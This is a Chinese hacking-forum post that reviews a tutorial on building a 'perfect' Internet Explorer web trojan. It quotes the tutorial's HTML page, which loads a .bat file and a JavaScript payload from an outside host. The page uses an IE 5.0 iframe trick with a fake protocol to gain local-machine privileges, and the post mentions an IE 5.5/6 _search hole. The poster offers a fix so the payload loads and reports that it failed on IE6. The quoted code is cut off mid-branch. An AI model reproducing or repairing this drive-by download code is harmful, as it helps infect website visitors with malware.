“打造完美的IE网页木马”-------http://bbs.hackbase.com/viewthread.php?tid=2705719&fpage=1
这篇精华大家都看了吧,有人说很好收藏了,有人说根本没用。这到底行不行呢?
现在我来说说我实验后的看法:
我们按他说的做:一个HTM,一个JS。大家看愿文的HTM部分:
============================================
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<TITLE>冰狐浪子网络技术实验室的完美IE网页木马</TITLE>
</HEAD>
<BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0">
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
<SCRIPT LANGUAGE="javascript">
//此处设置上面icyfox.js文件的网络地址
//请把http://www.godog.y365.com/wodemuma/icyfox.js改为你的icyfox.js文件实际上传地址
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(///g,’//’);
WIE=navigator.appVersion;
if(WIE.indexOf("MSIE 5.0")>-1){
/*IE 5.0利用iframe标签,src属性设为icyfox://则会使此标签具备“我的电脑”域的权限,原因是因为icyfox://是不存在的协议,所以会IE会利用res://协议打开SHDOCLC.DLL中的语法错误页syntax.htm,而且SHDOCLC.DLL又位于系统目录中,为在 icyfox.js中得到WINDOWS系统目录和系统盘提供数据;*/
document.write("<iframe style=’display:none;’ name=’icyfoxlovelace’ src=’icyfox://’></iframe>");
setTimeout("muma0()",1000);
}
else {
===================================
大家看这里
原文中“//请把http://www.godog.y365.com/wodemuma/icyfox.js改为你的icyfox.js文件实际上传地址
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(///g,’//’);“最后的replace(///g,’//’)我想可能是作者的失误,要不就是我的机器问题了,如果直接打开这个HTM是不会想作者说的引用icyfox.js的,这里有点小问题--------replace(///g,’//’);这句话的意思是把全部的”/“用”//“取代。这里应该该为-----replace(///g,“//”);看出区别了吗? 把单撇该为引号, 否则浏览器是会报错而不能转向ICYFOX.JS
改了后IE自动打开 icyfox/// (如果你是没改JS文件名的话)
我是IE6.0SP1,还是打不开木马程序。作者说“/*IE 5.0利用iframe标签,src属性设为icyfox://则会使此标签具备“我的电脑”域的权限,原因是因为icyfox://是不存在的协议,所以会IE会利用res://协议打开SHDOCLC.DLL中的语法错误页syntax.htm,而且SHDOCLC.DLL又位于系统目录中,为在 icyfox.js中得到WINDOWS系统目录和系统盘提供数据;*/ ”“/*IE5.5、 IE6.0则利用_search漏洞,把打开的地址设为icyfox://,从而使_search搜索框具备“我的电脑”域的权限,因为在IE6.0中无法用上面的iframe漏洞,IE5.5应该可以用,我没有测试。这样做的结果会打开搜索栏,有点遗憾!*/ ”
我没法实验,我的浏览起并没用res://协议打开也没打开搜索栏,用Microsoft.XMLHTTP控件也不成功。
就是这些,希望我说的是对的,给实验的朋友一些帮助,呵呵
标签: 木马
